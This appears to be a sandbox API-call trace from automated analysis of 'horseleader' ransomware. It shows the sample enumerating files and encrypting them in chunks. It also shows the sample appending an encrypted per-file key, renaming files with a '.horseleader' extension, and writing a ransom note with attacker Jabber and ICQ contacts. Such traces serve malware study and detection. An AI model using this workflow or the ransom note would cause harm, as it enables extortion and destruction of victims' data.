cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.449] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.449] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\.") returned 66 [0248.449] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.449] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.449] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.449] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\..") returned 67 [0248.449] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.449] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.450] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb22e200, ftCreationTime.dwHighDateTime=0x1c82168, ftLastAccessTime.dwLowDateTime=0x753cc70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbb22e200, ftLastWriteTime.dwHighDateTime=0x1c82168, nFileSizeHigh=0x0, nFileSizeLow=0x38200, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1FREN.DLL", cAlternateFileName="")) returned 1 [0248.450] lstrcmpiW (lpString1="MSB1FREN.DLL", lpString2="Windows") returned -1 [0248.450] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL") returned 77 [0248.450] StrStrIW (lpFirst="MSB1FREN.DLL", lpSrch=".horseleader") returned 0x0 [0248.450] lstrcmpW (lpString1="MSB1FREN.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.450] lstrcmpW (lpString1="MSB1FREN.DLL", lpString2="_uninstalling_.png") returned 1 [0248.450] lstrlenW (lpString=".testttjffg") returned 11 [0248.450] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL", lpSrch=".testttjffg") returned 0x0 [0248.450] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.450] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.450] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL") returned 77 [0248.451] StrStrW (lpFirst="MSB1FREN.DLL", lpSrch=".txt") returned 0x0 [0248.451] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=229888) returned 1 [0248.452] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.452] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.475] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.475] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.476] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x19900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.476] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.477] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.477] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.477] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x33200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.477] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.485] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.485] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.486] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.486] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.486] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.486] CloseHandle (hObject=0x1a4) returned 1 [0248.486] GetProcessHeap () returned 0x780000 [0248.486] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.487] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.horseleader") returned 89 [0248.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll.horseleader")) returned 1 [0248.488] GetProcessHeap () returned 0x780000 [0248.488] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.488] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x238a8600, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x753cc70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x238a8600, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xcd2ac, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1FREN.ITS", cAlternateFileName="")) returned 1 [0248.488] lstrcmpiW (lpString1="MSB1FREN.ITS", lpString2="Windows") returned -1 [0248.488] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS") returned 77 [0248.488] StrStrIW (lpFirst="MSB1FREN.ITS", lpSrch=".horseleader") returned 0x0 [0248.488] lstrcmpW (lpString1="MSB1FREN.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.488] lstrcmpW (lpString1="MSB1FREN.ITS", lpString2="_uninstalling_.png") returned 1 [0248.488] lstrlenW (lpString=".testttjffg") returned 11 [0248.489] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS", lpSrch=".testttjffg") returned 0x0 [0248.489] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.489] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.489] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS") returned 77 [0248.489] StrStrW (lpFirst="MSB1FREN.ITS", lpSrch=".txt") returned 0x0 [0248.489] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=840364) returned 1 [0248.490] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.490] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.492] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.492] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.493] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x64156, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.493] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.504] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.504] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.504] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xc82ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.505] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.507] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.508] CloseHandle (hObject=0x1a4) returned 1 [0248.508] GetProcessHeap () returned 0x780000 [0248.508] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.508] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS.horseleader") returned 89 [0248.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its.horseleader")) returned 1 [0248.510] GetProcessHeap () returned 0x780000 [0248.510] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.510] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d99e900, ftCreationTime.dwHighDateTime=0x1be6f08, ftLastAccessTime.dwLowDateTime=0x79672f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d99e900, ftLastWriteTime.dwHighDateTime=0x1be6f08, nFileSizeHigh=0x0, nFileSizeLow=0x96a00, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WT61FR.LEX", cAlternateFileName="")) returned 1 [0248.510] lstrcmpiW (lpString1="WT61FR.LEX", lpString2="Windows") returned 1 [0248.510] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX") returned 75 [0248.510] StrStrIW (lpFirst="WT61FR.LEX", lpSrch=".horseleader") returned 0x0 [0248.510] lstrcmpW (lpString1="WT61FR.LEX", lpString2="#Decrypt#.txt") returned 1 [0248.510] lstrcmpW (lpString1="WT61FR.LEX", lpString2="_uninstalling_.png") returned 1 [0248.510] lstrlenW (lpString=".testttjffg") returned 11 [0248.510] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX", lpSrch=".testttjffg") returned 0x0 [0248.510] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.510] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.510] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX") returned 75 [0248.512] StrStrW (lpFirst="WT61FR.LEX", lpSrch=".txt") returned 0x0 [0248.512] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=616960) returned 1 [0248.512] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.512] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.521] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.521] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.522] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x48d00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.522] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.541] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.541] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.541] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x91a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.542] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.551] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.551] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.551] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.552] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.552] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.552] CloseHandle (hObject=0x1a4) returned 1 [0248.552] GetProcessHeap () returned 0x780000 [0248.552] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.552] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX.horseleader") returned 87 [0248.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex.horseleader")) returned 1 [0248.559] GetProcessHeap () returned 0x780000 [0248.559] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.559] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d99e900, ftCreationTime.dwHighDateTime=0x1be6f08, ftLastAccessTime.dwLowDateTime=0x79672f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d99e900, ftLastWriteTime.dwHighDateTime=0x1be6f08, nFileSizeHigh=0x0, nFileSizeLow=0x96a00, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WT61FR.LEX", cAlternateFileName="")) returned 0 [0248.559] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.559] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\#Decrypt#.txt") returned 78 [0248.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.560] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.560] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.562] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVE